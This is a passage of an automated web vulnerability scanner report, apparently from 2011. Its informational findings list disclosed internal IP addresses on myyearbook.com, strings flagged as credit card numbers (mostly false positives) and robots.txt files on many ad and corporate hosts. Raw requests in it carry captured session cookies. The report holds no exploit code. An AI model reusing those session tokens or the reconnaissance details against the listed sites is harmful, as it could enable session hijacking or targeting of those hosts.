Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e; mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311271168.1; __utmb=138725551.1.10.1311271168; __utmc=138725551; __utmz=138725551.1311271168.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; MYB_TARGET=_unknown_1000_____; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg

Response

23.179. http://www.myyearbook.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.100.10.106

Request

GET /favicon.ico HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311273812.2; __utmz=138725551.1311273812.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg; __utmv=138725551.|1=gender=unknown=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 21 Jul 2011 19:19:51 GMT
Server: Apache
Content-Length: 209
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-MyPoolMember: 10.100.10.106

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

23.180. http://www.myyearbook.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.100.10.248

Request

GET /favicon.ico HTTP/1.1
Host: www.myyearbook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: mybRegTheme=hbl; mybRegData=%5B%5D; POSTAff2Cookie=HBL; __utma=138725551.1708338480.1311271168.1311271168.1311273812.2; __utmz=138725551.1311273812.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __qca=P0-1424153722-1311271168512; scorecardresearch=89164312-271382480-1311271170773; __gads=ID=e4ff36fbd53734c2:T=1311271225:S=ALNI_MYXbcCfMT7-Mayo-AiWicg3ClEByg; __utmv=138725551.|1=gender=unknown=1

Response

HTTP/1.1 404 Not Found
Date: Thu, 21 Jul 2011 19:19:56 GMT
Server: Apache
Content-Length: 209
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-MyPoolMember: 10.100.10.248

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

23.181. http://www.myyearbook.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.100.10.245

Request

Response

HTTP/1.1 404 Not Found
Date: Thu, 21 Jul 2011 19:24:58 GMT
Server: Apache
Content-Length: 209
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-MyPoolMember: 10.100.10.245

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

23.182. http://www.myyearbook.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.100.10.176

Request

GET /favicon.ico HTTP/1.1
Host: www.myyearbook.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=2c530ecfb8656132aeda122a7a4d2f3e

Response

HTTP/1.1 404 Not Found
Date: Thu, 21 Jul 2011 19:18:41 GMT
Server: Apache
Content-Length: 209
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-MyPoolMember: 10.100.10.176

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

23.183. http://www.myyearbook.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.100.20.26

Request

Response

HTTP/1.1 404 Not Found
Date: Thu, 21 Jul 2011 19:24:49 GMT
Server: Apache
Content-Length: 209
Connection: close
Content-Type: text/html; charset=iso-8859-1
X-MyPoolMember: 10.100.20.26

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
</body
...[SNIP]...

24. Credit card numbers disclosed previous next
There are 4 instances of this issue:

http://greatponds.squarespace.com/universal/scripts/squarespace-gallery-slideshow.js
http://rad.msn.com/ADSAdClient31.dll
http://www.bing.com/search
http://www.greatpondsma.org/universal/scripts/squarespace-gallery-slideshow.js

Issue background

Responses containing credit card numbers may not represent any security vulnerability - for example, a number may belong to the logged-in user to whom it is displayed. You should verify whether the numbers identified are actually valid credit card numbers and whether their disclosure within the application is appropriate.

24.1. http://greatponds.squarespace.com/universal/scripts/squarespace-gallery-slideshow.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://greatponds.squarespace.com
Path:	/universal/scripts/squarespace-gallery-slideshow.js

Issue detail

The following credit card number was disclosed in the response:

5056179775280898

Request

GET /universal/scripts/squarespace-gallery-slideshow.js?CE=27 HTTP/1.1
Host: greatponds.squarespace.com
Proxy-Connection: keep-alive
Referer: http://greatponds.squarespace.com/get-involved/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=9F024BFCD9D54EAEEB165C54DB57F8E4.web125; ss_lastvisit=1311426661245; WebPersCookie=toq34UxfYnRKkR288w7usH+6wdXqHs9RkEUHAxFtlhFm8gum1EhPPfZKDCvjA+jlkI0fm1YYVXNCBNc=

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=94608000
Pragma: cache
X-ServedBy: web118
ETag: W/"10444-1311285758000"
Last-Modified: Thu, 21 Jul 2011 22:02:38 GMT
Content-Type: text/javascript
Server: SSWS
Content-Length: 10444
Date: Sat, 23 Jul 2011 13:11:10 GMT
X-Varnish: 2960543272 2940607718
Age: 137298
Via: 1.1 varnish
Connection: Keep-Alive
Vary: Accept-Encoding, User-Agent

YUI.add("squarespace-gallery-slideshow",function(F){F.namespace("Squarespace");var E="Next";var A="Prev";var B="swipe";var C="fade";var D=1.5056179775280898;F.Squarespace.GallerySlideShow=Class.create({initialize:function(K){this.params=K;this.scriptId=K.scriptId;this.currentSlide=0;this.isAnimating=false;this.maxSlides=(this.params.slideTransition==B)?3:
...[SNIP]...

24.2. http://rad.msn.com/ADSAdClient31.dll previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rad.msn.com
Path:	/ADSAdClient31.dll

Issue detail

The following credit card number was disclosed in the response:

4000000000043978

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Cteonnt-Length: 834
Content-Type: text/html; Charset=utf-8
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Server: Microsoft-IIS/7.5
X-RADID: P8750829-T34931985-C4000000000043978
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Access-Control-Allow-Origin: *
Date: Sat, 23 Jul 2011 04:54:51 GMT
Content-Length: 834

//<![CDATA[
function getRADIds() { return{"adid":"4000000000043978","pid":"8750829","targetid":"34931985"};}
if(typeof(inDapIF) != "undefined"){parent.dap_Resize(document.body.id, 728, 90);}
try
{
   if(typeof(inDapIF) != "undefined")
   {
       parent.ShowAcb(document.body.id, 4000000000043978, 728, 90, "g.msn.com", "2AD0004Q","8750829", null);
   }
}
catch(e){}
document.write('<div id="offsetDiv_188435110" style="overflow:hidden;width:728px;height:90px"><a href="http://g.msn.com/2AD0004Q/4000000000043978.1??PID=8750829&UIT=G&TargetID=34931985&AN=188435110&PG=CMS3TL&ASID=b3605fd4bb9e43c99287e318ca7db4d0" target="_blank">
...[SNIP]...

24.3. http://www.bing.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/search

Issue detail

The following credit card numbers were disclosed in the response:

4669613241009061
4673143705175475

Request

Response

24.4. http://www.greatpondsma.org/universal/scripts/squarespace-gallery-slideshow.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.greatpondsma.org
Path:	/universal/scripts/squarespace-gallery-slideshow.js

Issue detail

The following credit card number was disclosed in the response:

5056179775280898

Request

GET /universal/scripts/squarespace-gallery-slideshow.js?CE=27 HTTP/1.1
Host: www.greatpondsma.org
Proxy-Connection: keep-alive
Referer: http://www.greatpondsma.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=87536A4DDFC5C4B2E965B498758387AE.web125; ss_lastvisit=1311426616535; WebPersCookie=B2Hc4SKbaflWHou88w7usH+6wdXqHu2psE19EUGTmeBJisCZPUm/gk734KQiYR5etFU8jSleSlDi4k0=

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=94608000
Pragma: cache
X-ServedBy: web118
ETag: W/"10444-1311285758000"
Last-Modified: Thu, 21 Jul 2011 22:02:38 GMT
Content-Type: text/javascript
Server: SSWS
Content-Length: 10444
Date: Sat, 23 Jul 2011 13:10:22 GMT
X-Varnish: 2960538001 2940607718
Age: 137251
Via: 1.1 varnish
Connection: Keep-Alive
Vary: Accept-Encoding, User-Agent

YUI.add("squarespace-gallery-slideshow",function(F){F.namespace("Squarespace");var E="Next";var A="Prev";var B="swipe";var C="fade";var D=1.5056179775280898;F.Squarespace.GallerySlideShow=Class.create({initialize:function(K){this.params=K;this.scriptId=K.scriptId;this.currentSlide=0;this.isAnimating=false;this.maxSlides=(this.params.slideTransition==B)?3:
...[SNIP]...

25. Robots.txt file previous next
There are 51 instances of this issue:

http://204.124.80.52/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif
http://ad.doubleclick.net/activity
http://altfarm.mediaplex.com/ad/js/16024-128483-16880-2
http://analytics.spongecell.com/placements/47958921
http://api.facebook.com/restserver.php
http://cheetah.vizu.com/f.gif
http://clk.atdmt.com/goiframe/223672189/334126009/direct
https://code.google.com/p/domsnitch/downloads/list
http://community.spiceworks.com/r/595
http://dinclinx.com/
http://feeds.bbci.co.uk/news/rss.xml
http://fls.doubleclick.net/activityi
http://forums-test.vostu.com/clientscript/ncode_imageresizer.js
http://go.microsoft.com/fwlink/
http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071724218/
http://haymarketbusinesspublications.122.2o7.net/b/ss/haymarketscmagazineus,haymarketusglobal/1/H.21/s25559028366202
http://i.microsoft.com/en-us/homepage/bimapping.js
http://i3.microsoft.com/library/svy/broker-config_s1.js
http://images.apple.com/support/expresslane/data/properties.json
http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js
http://jlinks.industrybrains.com/jsct
http://l.addthiscdn.com/live/t00/152lo.gif
http://metrics.apple.com/b/ss/appleglobal,applehome/1/H.22.1/s45228154349606
http://mm.chitika.net/minimall
http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml
http://pagead2.googlesyndication.com/pagead/imgad
http://paid.outbrain.com/favicon.ico
http://pixel.everesttech.net/2368/gr
http://pixel1350.everesttech.net/1350/p
http://pshared.5min.com/Scripts/ThumbSeed2.Style.js
http://pubads.g.doubleclick.net/gampad/ads
http://puma.vizu.com/cdn/00/00/22/09/smart_tag.js
http://rad.msn.com/ADSAdClient31.dll
http://s7.addthis.com/static/r07/sh46.html
http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYlrYDIJq2AyoFF9sAAA8yBRbbAAAB
http://static.ak.fbcdn.net/connect/xd_proxy.php
http://tag.admeld.com/ad/js/785/lifescript/728x90/ros
http://web2.checkm8.com/adam/detect
http://www.apple.com/
http://www.betabeat.com/2011/07/19/fever-pitch-new-yorkers-go-starry-eyed-for-start-ups/
http://www.datacard.com/
http://www.facebook.com/plugins/likebox.php
http://www.google-analytics.com/__utm.gif
http://www.googleadservices.com/pagead/conversion/1071724218/
http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx
http://www.microsoft.com/en-us/security_essentials/default.aspx
http://www.observer.com/wp-content/themes/nyo_tech/js/global.js
http://www.paloaltonetworks.com/cam/switch/index.php
http://www.righthealth.com/external/ads/clo.gif
http://www.scmagazineus.com/
http://www.walmartlabs.com/

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

25.1. http://204.124.80.52/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://204.124.80.52
Path:	/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 204.124.80.52

Response

HTTP/1.1 200 OK
Content-Length: 240
Content-Type: text/plain
Last-Modified: Thu, 21 Nov 2002 00:40:50 GMT
Accept-Ranges: bytes
ETag: "0d58ba3f690c21:621"
Server: Microsoft-IIS/6.0
Date: Thu, 21 Jul 2011 16:03:31 GMT
Connection: close

##############################
#
# Webtrends SmartSource Data Collector from NetIQ
# FileName: robots.txt
# LastModified: 2/27/2002
#
##############################
User-agent: stress-agent
D
...[SNIP]...

25.2. http://ad.doubleclick.net/activity previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/activity

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Thu, 21 Jul 2011 16:13:59 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

25.3. http://altfarm.mediaplex.com/ad/js/16024-128483-16880-2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/16024-128483-16880-2

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1289502470000"
Last-Modified: Thu, 11 Nov 2010 19:07:50 GMT
Content-Type: text/plain
Content-Length: 26
Date: Thu, 21 Jul 2011 19:28:47 GMT
Connection: keep-alive

User-agent: *
Disallow: /

25.4. http://analytics.spongecell.com/placements/47958921 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.spongecell.com
Path:	/placements/47958921

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: analytics.spongecell.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Thu, 21 Jul 2011 19:30:49 GMT
Content-Type: text/plain
Content-Length: 184
Last-Modified: Tue, 14 Jun 2011 02:08:32 GMT
Connection: close
Vary: Accept-Encoding
Expires: Thu, 21 Jul 2011 19:30:48 GMT
Cache-Control: no-cache
Accept-Ranges: bytes

User-agent: *
Disallow: /event/event_new/
Disallow: /events/
Disallow: /ads/
Disallow: /widgets/
Disallow: /creatives/
Disallow: /placements/
Disallow: /flights/
Disallow: /campaigns/

25.5. http://api.facebook.com/restserver.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.facebook.com
Path:	/restserver.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: text/plain; charset=utf-8
Expires: Sat, 20 Aug 2011 19:22:11 GMT
X-FB-Server: 10.42.65.49
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

25.6. http://cheetah.vizu.com/f.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cheetah.vizu.com
Path:	/f.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: cheetah.vizu.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:25:09 GMT
Server: PWS/1.7.3.3
X-Px: ms iad-agg-n13 ( iad-agg-n34), ht-d iad-agg-n34.panthercdn.com
ETag: "3c053-1a-8dc02bc0"
Cache-Control: max-age=604800
Expires: Sun, 24 Jul 2011 09:26:11 GMT
Age: 381538
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 14 Jul 2011 23:04:23 GMT
Connection: close

User-agent: *
Disallow: /

25.7. http://clk.atdmt.com/goiframe/223672189/334126009/direct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/goiframe/223672189/334126009/direct

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 101
Content-Type: text/html
Date: Thu, 21 Jul 2011 17:36:10 GMT
Connection: close

User-agent: *
Disallow: /

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

25.8. https://code.google.com/p/domsnitch/downloads/list previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://code.google.com
Path:	/p/domsnitch/downloads/list

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: code.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Language,Cookie,Referer
Content-Type: text/plain; charset=ISO-8859-1
ETag: "d6024b2de2848b59feb3d62ffb1df32c"
Last-Modified: Sat, 18 Dec 2010 23:18:15 GMT
Date: Thu, 21 Jul 2011 20:03:44 GMT
Expires: Thu, 21 Jul 2011 21:03:44 GMT
Cache-Control: public, max-age=3600
X-Content-Type-Options: nosniff
Server: codesite_static_content
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /p/*/issues/csv
Disallow: /p/*/source/diff
Disallow: /a/
Allow: /a/eclipselabs.org/
Allow: /a/apache-extras.org/
Disallow: /a/*/p/*/issues/csv
Disallow: /a/*/p/*/source/diff
Cr
...[SNIP]...

25.9. http://community.spiceworks.com/r/595 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.spiceworks.com
Path:	/r/595

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: community.spiceworks.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 17:35:42 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 13 Jul 2011 02:05:00 GMT
ETag: "3d10fba-7b0-4a7e9d800eb00"
Accept-Ranges: bytes
Content-Length: 1968
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
User-agent: *

Disallow: /search?
Disallow: /search

Disallow: /login

Disallow: /admin
Disallow: /u
...[SNIP]...

25.10. http://dinclinx.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dinclinx.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: dinclinx.com

Response

HTTP/1.1 200 OK
Content-Length: 28
Content-Type: text/plain
Content-Location: http://dinclinx.com/robots.txt
Last-Modified: Thu, 06 Aug 2009 19:25:52 GMT
Accept-Ranges: bytes
ETag: "020efb5cb16ca1:2532"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 22 Jul 2011 20:13:14 GMT
Connection: close

User-agent: *
Disallow: /

25.11. http://feeds.bbci.co.uk/news/rss.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://feeds.bbci.co.uk
Path:	/news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Server: Apache
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=3489
Expires: Thu, 21 Jul 2011 17:01:29 GMT
Date: Thu, 21 Jul 2011 16:03:20 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

25.12. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 21 Jul 2011 20:29:32 GMT
Server: Floodlight server
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

25.13. http://forums-test.vostu.com/clientscript/ncode_imageresizer.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://forums-test.vostu.com
Path:	/clientscript/ncode_imageresizer.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: forums-test.vostu.com

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:14:27 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_fcgid/2.3.5 mod_ssl/2.2.14 OpenSSL/0.9.8k
Last-Modified: Thu, 09 Jun 2011 22:33:27 GMT
ETag: "73c787-1a-4a54f0aadbbc0"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

25.14. http://go.microsoft.com/fwlink/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://go.microsoft.com
Path:	/fwlink/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: go.microsoft.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 06 Apr 2011 05:30:27 GMT
Accept-Ranges: bytes
ETag: "7d58abbc1bf4cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Thu, 21 Jul 2011 17:36:33 GMT
Connection: keep-alive
Content-Length: 95

# Robots.txt file for http://go.microsoft.com
#

User-agent: *
Allow:/fwlink/p/
Disallow:/

25.15. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071724218/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/viewthroughconversion/1071724218/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 21 Jul 2011 16:03:51 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

25.16. http://haymarketbusinesspublications.122.2o7.net/b/ss/haymarketscmagazineus,haymarketusglobal/1/H.21/s25559028366202 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://haymarketbusinesspublications.122.2o7.net
Path:	/b/ss/haymarketscmagazineus,haymarketusglobal/1/H.21/s25559028366202

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: haymarketbusinesspublications.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:05 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "1781c9-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www425
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

25.17. http://i.microsoft.com/en-us/homepage/bimapping.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.microsoft.com
Path:	/en-us/homepage/bimapping.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: i.microsoft.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 13 Sep 2006 01:14:33 GMT
ETag: "a948f0f8d1d6c61:0"
Server: Microsoft-IIS/7.5
VTag: 279475942200000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cache-Control: max-age=844
Date: Thu, 21 Jul 2011 20:05:06 GMT
Content-Length: 155
Connection: close

# Robots.txt file for non www.microsoft.com hostnames (e.g. img.microsoft.com, css.microsoft.com, js.microsoft.com, ...)
#

User-agent: *
Disallow: /

25.18. http://i3.microsoft.com/library/svy/broker-config_s1.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i3.microsoft.com
Path:	/library/svy/broker-config_s1.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: i3.microsoft.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 13 Sep 2006 01:14:33 GMT
ETag: "a948f0f8d1d6c61:0"
Server: Microsoft-IIS/7.5
VTag: 279475942200000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Cache-Control: max-age=829
Date: Thu, 21 Jul 2011 20:05:21 GMT
Content-Length: 155
Connection: close

# Robots.txt file for non www.microsoft.com hostnames (e.g. img.microsoft.com, css.microsoft.com, js.microsoft.com, ...)
#

User-agent: *
Disallow: /

25.19. http://images.apple.com/support/expresslane/data/properties.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/expresslane/data/properties.json

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: images.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 06 Jan 1998 23:24:02 GMT
ETag: "41-3241c557be880"
Server: Apache/2.2.14 (Unix)
X-Cache-TTL: 230
X-Cached-Time: Thu, 21 Jul 2011 13:28:14 GMT
Cteonnt-Length: 64
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=600
Expires: Thu, 21 Jul 2011 20:41:53 GMT
Date: Thu, 21 Jul 2011 20:31:53 GMT
Content-Length: 64
Connection: close

# robots.txt for http://www.apple.com/
User-agent: *
Disallow:

25.20. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/16024/128483/lifescript-470x250.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
